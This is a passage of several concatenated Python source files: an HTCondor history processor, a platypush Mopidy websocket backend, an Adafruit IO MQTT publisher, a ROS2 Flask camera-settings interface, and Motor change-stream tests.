machine, {"GlobalJobId": "Unknown", "EnteredCurrentStatus": 0}
)
future = pool.apply_async(
process_startd,
(starttime, since, checkpoint_queue, startd_ad, args, metadata),
)
futures.append((machine, future))
def _chkp_updater():
while True:
try:
job = checkpoint_queue.get()
if job is None: # Swallow poison pill
break
except EOFError as error:
logging.warning(
"EOFError - Nothing to consume left in the queue %s", error
)
break
update_checkpoint(args.checkpoint_file, *job)
chkp_updater = multiprocessing.Process(target=_chkp_updater)
chkp_updater.start()
# Report processes if they timeout or error
for name, future in futures:
try:
future.get(timeout)
except multiprocessing.TimeoutError:
# This implies that the checkpoint hasn't been updated
message = f"Daemon {name} history timed out; ignoring progress."
logging.warning(message)
except elasticsearch.exceptions.TransportError:
message = f"Transport error while sending history data of {name}; ignoring progress."
logging.exception(message)
except Exception:
message = f"Error getting progress from {name}."
logging.exception(message)
checkpoint_queue.put(None) # Send a poison pill
chkp_updater.join()
logging.warning(
f"Processing time for history: {((time.time() - starttime) / 60.0)} mins"
)
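# Minimal usage sketch for process_histories(); hypothetical, since in condor_adstash
# the args object, the schedd/startd ads, and the metadata normally come from its
# configuration and a collector query:
#
#   import multiprocessing, time
#   with multiprocessing.Pool(processes=4) as pool:
#       process_histories(schedd_ads=schedd_ads, starttime=time.time(),
#                         pool=pool, args=args, metadata={})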
|
mopidy.py
|
import json
import re
import threading
from platypush.backend import Backend
from platypush.message.event.music import MusicPlayEvent, MusicPauseEvent, \
MusicStopEvent, NewPlayingTrackEvent, PlaylistChangeEvent, VolumeChangeEvent, \
PlaybackConsumeModeChangeEvent, PlaybackSingleModeChangeEvent, \
PlaybackRepeatModeChangeEvent, PlaybackRandomModeChangeEvent, \
MuteChangeEvent, SeekChangeEvent
# noinspection PyUnusedLocal
class MusicMopidyBackend(Backend):
"""
    This backend listens for events from a Mopidy music server over its
    websocket interface. Because it relies on the Mopidy websocket API, it is
    only compatible with Mopidy and not with other MPD servers. Use
    :class:`platypush.backend.music.mpd.MusicMpdBackend` for a similar
    polling-based solution if you're not running Mopidy, or if your instance
    has the websocket interface or web port disabled.
Triggers:
* :class:`platypush.message.event.music.MusicPlayEvent` if the playback state changed to play
* :class:`platypush.message.event.music.MusicPauseEvent` if the playback state changed to pause
* :class:`platypush.message.event.music.MusicStopEvent` if the playback state changed to stop
* :class:`platypush.message.event.music.NewPlayingTrackEvent` if a new track is being played
* :class:`platypush.message.event.music.PlaylistChangeEvent` if the main playlist has changed
* :class:`platypush.message.event.music.VolumeChangeEvent` if the main volume has changed
* :class:`platypush.message.event.music.MuteChangeEvent` if the mute status has changed
* :class:`platypush.message.event.music.SeekChangeEvent` if a track seek event occurs
Requires:
* **websocket-client** (``pip install websocket-client``)
* Mopidy installed and the HTTP service enabled
"""
def __init__(self, host='localhost', port=6680, **kwargs):
super().__init__(**kwargs)
self.host = host
self.port = int(port)
self.url = 'ws://{}:{}/mopidy/ws'.format(host, port)
self._msg_id = 0
self._ws = None
self._latest_status = {}
self._reconnect_thread = None
self._connected_event = threading.Event()
try:
self._latest_status = self._get_tracklist_status()
except Exception as e:
self.logger.warning('Unable to get mopidy status: {}'.format(str(e)))
@staticmethod
def _parse_track(track, pos=None):
if not track:
return {}
conv_track = track.get('track', {}).copy()
conv_track['id'] = track.get('tlid')
conv_track['file'] = conv_track['uri']
del conv_track['uri']
if 'artists' in conv_track:
conv_track['artist'] = conv_track['artists'][0].get('name')
del conv_track['artists']
if 'name' in conv_track:
conv_track['title'] = conv_track['name']
del conv_track['name']
if 'album' in conv_track:
conv_track['album'] = conv_track['album']['name']
if 'length' in conv_track:
conv_track['time'] = conv_track['length']/1000 \
if conv_track['length'] else conv_track['length']
del conv_track['length']
if pos is not None:
conv_track['pos'] = pos
if '__model__' in conv_track:
del conv_track['__model__']
return conv_track
def _communicate(self, msg):
import websocket
if isinstance(msg, str):
msg = json.loads(msg)
self._msg_id += 1
msg['jsonrpc'] = '2.0'
msg['id'] = self._msg_id
msg = json.dumps(msg)
ws = websocket.create_connection(self.url)
ws.send(msg)
response = json.loads(ws.recv()).get('result')
ws.close()
return response
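    # Note on the _communicate() helper above: a call such as
    # self._communicate({'method': 'core.tracklist.get_repeat'}) sends a JSON-RPC
    # request of the form {"jsonrpc": "2.0", "id": 1, "method": "core.tracklist.get_repeat"}
    # over the websocket and returns whatever the reply carries under its "result" key.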
def _get_tracklist_status(self):
return {
'repeat': self._communicate({
'method': 'core.tracklist.get_repeat'}),
'random': self._communicate({
'method': 'core.tracklist.get_random'}),
'single': self._communicate({
'method': 'core.tracklist.get_single'}),
'consume': self._communicate({
'method': 'core.tracklist.get_consume'}),
}
def _on_msg(self):
def hndl(ws, msg):
msg = json.loads(msg)
event = msg.get('event')
if not event:
return
status = {}
track = msg.get('tl_track', {})
if event == 'track_playback_paused':
status['state'] = 'pause'
track = self._parse_track(track)
if not track:
return
self.bus.post(MusicPauseEvent(status=status, track=track))
elif event == 'track_playback_resumed':
status['state'] = 'play'
track = self._parse_track(track)
if not track:
return
self.bus.post(MusicPlayEvent(status=status, track=track))
elif event == 'track_playback_ended' or (
event == 'playback_state_changed'
and msg.get('new_state') == 'stopped'):
status['state'] = 'stop'
track = self._parse_track(track)
self.bus.post(MusicStopEvent(status=status, track=track))
elif event == 'track_playback_started':
track = self._parse_track(track)
if not track:
return
status['state'] = 'play'
status['position'] = 0.0
status['time'] = track.get('time')
self.bus.post(NewPlayingTrackEvent(status=status, track=track))
elif event == 'stream_title_changed':
                m = re.match(r'^\s*(.+?)\s+-\s+(.*)\s*$', msg.get('title', ''))
if not m:
return
track['artist'] = m.group(1)
track['title'] = m.group(2)
status['state'] = 'play'
status['position'] = 0.0
self.bus.post(NewPlayingTrackEvent(status=status, track=track))
elif event == 'volume_changed':
status['volume'] = msg.get('volume')
self.bus.post(VolumeChangeEvent(volume=status['volume'],
status=status, track=track))
elif event == 'mute_changed':
status['mute'] = msg.get('mute')
self.bus.post(MuteChangeEvent(mute=status['mute'],
status=status, track=track))
elif event == 'seeked':
status['position'] = msg.get('time_position')/1000
self.bus.post(SeekChangeEvent(position=status['position'],
status=status, track=track))
elif event == 'tracklist_changed':
tracklist = [self._parse_track(t, pos=i)
for i, t in enumerate(self._communicate({
'method': 'core.tracklist.get_tl_tracks'}))]
self.bus.post(PlaylistChangeEvent(changes=tracklist))
elif event == 'options_changed':
new_status = self._get_tracklist_status()
if new_status['random'] != self._latest_status.get('random'):
self.bus.post(PlaybackRandomModeChangeEvent(state=new_status['random']))
if new_status['repeat'] != self._latest_status['repeat']:
self.bus.post(PlaybackRepeatModeChangeEvent(state=new_status['repeat']))
if new_status['single'] != self._latest_status['single']:
self.bus.post(PlaybackSingleModeChangeEvent(state=new_status['single']))
if new_status['consume'] != self._latest_status['consume']:
self.bus.post(PlaybackConsumeModeChangeEvent(state=new_status['consume']))
self._latest_status = new_status
return hndl
def _retry_connect(self):
def reconnect():
while not self.should_stop() and not self._connected_event.is_set():
try:
self._connect()
except Exception as e:
                    self.logger.warning('Error on websocket reconnection: {}'.format(str(e)))
self._connected_event.wait(timeout=10)
self._reconnect_thread = None
if not self._reconnect_thread or not self._reconnect_thread.is_alive():
self._reconnect_thread = threading.Thread(target=reconnect)
self._reconnect_thread.start()
def _on_error(self):
def hndl(ws, error):
self.logger.warning('Mopidy websocket error: {}'.format(error))
ws.close()
return hndl
def _on_close(self):
def hndl(ws):
self._connected_event.clear()
self._ws = None
self.logger.warning('Mopidy websocket connection closed')
self._retry_connect()
return hndl
def _on_open(self):
def hndl(ws):
self._connected_event.set()
self.logger.info('Mopidy websocket connected')
return hndl
def _connect(self):
import websocket
if not self._ws:
self._ws = websocket.WebSocketApp(self.url,
on_open=self._on_open(),
on_message=self._on_msg(),
on_error=self._on_error(),
on_close=self._on_close())
self._ws.run_forever()
def run(self):
super().run()
self.logger.info('Started tracking Mopidy events backend on {}:{}'.format(self.host, self.port))
self._connect()
# vim:sw=4:ts=4:et:
|
send data to feed with paho-mqtt publish.py
|
# Import standard python modules
import threading
import time
import os
import sys
# Import paho MQTT client.
import paho.mqtt.client as mqtt
# "global" Vars
if(len(sys.argv)!=4):
sys.stderr.write('Usage: "{0}" $AdafruitIOUsername $AdafruitIOKey $AdafruitIOFeedKey\n'.format(sys.argv[0]))
os._exit(1)
AdafruitIOFeedUsername=sys.argv[1]
AdafruitIOKey=sys.argv[2]# Beware, your Key is Secret!
AdafruitIOFeedKey=sys.argv[3]# Complete Feed key where data receive
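# Example invocation (the username, key, and feed key below are hypothetical):
#   python publish.py my_aio_username aio_XXXXXXXXXXXXXXXX tank-level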
# Define callback functions which will be called when certain events happen.
def on_connect(client, userdata, flags, rc):
# Connected function will be called when the client connects.
print("Conectado con codigo resultante: "+str(rc))
client.connectedFlag=True
def on_disconnect(client, userdata, rc):
    # Disconnected function will be called when the client disconnects.
    print("Disconnected!")
    os._exit(1)
# Define Functions for Threading
def send_message(client):
while True:
if(client.messageSend is not None):
# publish topic $username/feeds/$groupKey.$feedKey
client.publish(AdafruitIOFeedUsername+"/feeds/"+AdafruitIOFeedKey, client.messageSend)
time.sleep(10)
if __name__ == "__main__":
# Setup an MQTT Client Instance
client = mqtt.Client()
# Setup Callbacks
client.on_connect = on_connect
client.on_disconnect=on_disconnect
# Setup Control Vars
client.connectedFlag=False
client.messageSend="0"
# Setup Credentials
client.username_pw_set(username=AdafruitIOFeedUsername, password=AdafruitIOKey)
# Connect to the Broker server.
print("Conectando al broker")
client.connect(host="io.adafruit.com", port=1883, keepalive=60)
client.loop_start()
while not client.connectedFlag:
print("Esperando conexión")
time.sleep(1)
# Setup Threading, to publish message every 10 seconds
hilo0=threading.Thread(target=send_message, args=(client,))
hilo0.start()
# Mod publish value
while client.messageSend!="x":# char 'x' to exit
        client.messageSend=input("New value for the tank\n")
client.loop_stop()
client.disconnect()
    os._exit(0)
|
nssc_web_interface.py
|
import os
from flask import Flask, render_template, request, redirect
from ament_index_python.packages import get_package_share_directory
import rclpy
from rclpy.node import Node
from std_msgs.msg import String
from nssc_interface.msg import ColorFilterParams, CameraSettings
import threading
from dataclasses import dataclass
package_share_directory = get_package_share_directory('nssc_web_interface')
print(package_share_directory)
template_dir = os.path.abspath(package_share_directory + '/templates')
app = Flask(__name__, template_folder=template_dir)
web_command_publisher = None
@dataclass
class FilterStruct:
low_h: int
low_s: int
low_v: int
high_h: int
high_s: int
high_v: int
dilation_element: int
dilation_size: int
enable_detection: bool
enable_ndi: bool
current_pos = FilterStruct(86, 94, 22, 125, 229, 131, 0, 2, True, True)
@dataclass
class CameraStruct:
gain: int
exposure: int
current_cam = CameraStruct(20, 30000)
class WebCommandPublisher(Node):
def __init__(self):
super().__init__('nssc_web_interface')
self.CFpublisher = self.create_publisher(ColorFilterParams, 'color_filter_params', 10)
self.CSpublisher = self.create_publisher(CameraSettings, 'camera_settings', 10)
def sendColorFilter(self, current_pos):
msg = ColorFilterParams()
msg.low_h = current_pos.low_h
msg.low_s = current_pos.low_s
msg.low_v = current_pos.low_v
msg.high_h = current_pos.high_h
msg.high_s = current_pos.high_s
msg.high_v = current_pos.high_v
msg.dilation_element = current_pos.dilation_element
msg.dilation_size = current_pos.dilation_size
msg.enable_detection = current_pos.enable_detection
msg.enable_ndi = current_pos.enable_ndi
self.CFpublisher.publish(msg)
self.get_logger().info('Publishing color filter settings')
def sendCameraSettings(self, current_cam):
msg = CameraSettings()
msg.gain = current_cam.gain
msg.exposure = current_cam.exposure
self.CSpublisher.publish(msg)
self.get_logger().info('Publishing camera settings')
@app.route('/')
def index():
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
@app.route("/send", methods=["POST", "GET"])
def send():
global web_command_publisher
global current_pos
global current_cam
if request.method == 'POST':
current_pos.low_h = int(request.form["low_h"])
current_pos.low_s = int(request.form["low_s"])
current_pos.low_v = int(request.form["low_v"])
current_pos.high_h = int(request.form["high_h"])
current_pos.high_s = int(request.form["high_s"])
current_pos.high_v = int(request.form["high_v"])
current_pos.dilation_element = int(request.form["dilation_element"])
current_pos.dilation_size = int(request.form["dilation_size"])
web_command_publisher.sendColorFilter(current_pos)
return redirect('/')
else:
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
@app.route('/update', methods=['GET', 'POST'])
def update():
global current_pos
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
@app.route('/camera', methods=['GET', 'POST'])
def camera():
global web_command_publisher
global current_pos
global current_cam
if request.method == 'POST':
current_cam.gain = int(request.form["gain"])
current_cam.exposure = int(request.form["exposure"])
web_command_publisher.sendCameraSettings(current_cam)
return redirect('/')
else:
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
@app.route('/detection', methods=['GET', 'POST'])
def detection():
global web_command_publisher
global current_pos
global current_cam
if request.method == 'POST':
current_pos.enable_detection = not current_pos.enable_detection
web_command_publisher.sendColorFilter(current_pos)
return redirect('/')
else:
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
@app.route('/ndi', methods=['GET', 'POST'])
def ndi():
global web_command_publisher
global current_pos
global current_cam
if request.method == 'POST':
current_pos.enable_ndi = not current_pos.enable_ndi
web_command_publisher.sendColorFilter(current_pos)
return redirect('/')
else:
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
def run_page():
app.run(host="0.0.0.0")
def main(args=None):
global web_command_publisher
rclpy.init(args=args)
web_command_publisher = WebCommandPublisher()
t = threading.Thread(target=run_page)
t.start()
rclpy.spin(web_command_publisher)
web_command_publisher.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
|
test_motor_change_stream.py
|
# Copyright 2017-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals
"""Test MotorChangeStream."""
import os
import threading
import time
from pymongo.errors import InvalidOperation, OperationFailure
from tornado.testing import gen_test
from test import SkipTest, env
from test.tornado_tests import MotorTest
class MotorChangeStreamTest(MotorTest):
@classmethod
@env.require_version_min(3, 6)
def setUpClass(cls):
super(MotorChangeStreamTest, cls).setUpClass()
if env.is_standalone:
raise SkipTest("Standalone")
# Ensure the collection exists.
env.sync_cx.motor_test.test_collection.delete_many({})
env.sync_cx.motor_test.test_collection.insert_one({'_id': 1})
def wait_and_insert(self, change_stream, n=1):
# The start time of the change stream is nondeterministic. Wait
# to ensure this insert comes after the change stream starts.
def target():
start = time.time()
timeout = float(os.environ.get('ASYNC_TEST_TIMEOUT', 5))
while not change_stream.delegate:
if time.time() - start > timeout:
print("MotorChangeStream never created ChangeStream")
return
time.sleep(0.1)
self.io_loop.add_callback(self.collection.insert_many,
[{} for _ in range(n)])
t = threading.Thread(target=target)
t.daemon = True
t.start()
@gen_test
async def test_async_for(self):
change_stream = self.collection.watch()
self.wait_and_insert(change_stream, 2)
i = 0
async for _ in change_stream:
i += 1
if i == 2:
break
self.assertEqual(i, 2)
@gen_test
async def test_watch(self):
coll = self.collection
with self.assertRaises(TypeError):
# pipeline must be a list.
async for _ in coll.watch(pipeline={}):
pass
change_stream = coll.watch()
future = change_stream.next()
self.wait_and_insert(change_stream, 1)
change = await future
# New change stream with resume token.
await coll.insert_one({'_id': 23})
change = await coll.watch(resume_after=change['_id']).next()
self.assertEqual(change['fullDocument'], {'_id': 23})
@gen_test
async def test_close(self):
coll = self.collection
change_stream = coll.watch()
future = change_stream.next()
self.wait_and_insert(change_stream, 1)
await future
await change_stream.close()
with self.assertRaises(StopAsyncIteration):
await change_stream.next()
async for _ in change_stream:
pass
@gen_test
async def test_missing_id(self):
coll = self.collection
change_stream = coll.watch([{'$project': {'_id': 0}}])
future = change_stream.next()
self.wait_and_insert(change_stream)
with self.assertRaises(InvalidOperation):
await future
# The cursor should now be closed.
with self.assertRaises(StopAsyncIteration):
await change_stream.next()
@gen_test
async def test_unknown_full_document(self):
coll = self.collection
change_stream = coll.watch(full_document="unknownFullDocOption")
future = change_stream.next()
self.wait_and_insert(change_stream, 1)
with self.assertRaises(OperationFailure):
await future
@gen_test
async def test_async_with(self):
async with self.collection.watch() as change_stream:
self.wait_and_insert(change_stream, 1)
async for _ in change_stream:
self.assertTrue(change_stream.delegate._cursor.alive)
break
self.assertFalse(change_stream.delegate._cursor.alive)
@gen_test
async def test_with_statement(self):
with self.assertRaises(RuntimeError):
with self.collection.watch():
pass
@env.require_version_min(4, 0)
@gen_test
async def test_client(self):
change_stream = self.cx.watch()
self.wait_and_insert(change_stream, 2)
i = 0
async for _ in change_stream:
i += 1
if i == 2:
break
await self.cx.other_db.other_collection.insert_one({})
async for _ in change_stream:
i += 1
if i == 3:
break
@env.require_version_min(4, 0)
@gen_test
async def test_database(self):
change_stream = self.db.watch()
self.wait_and_insert(change_stream, 2)
i = 0
async for _ in change_stream:
i += 1
if i == 2:
break
await self.db.other_collection.insert_one({})
async for _ in change_stream:
i += 1
if i == 3:
break
|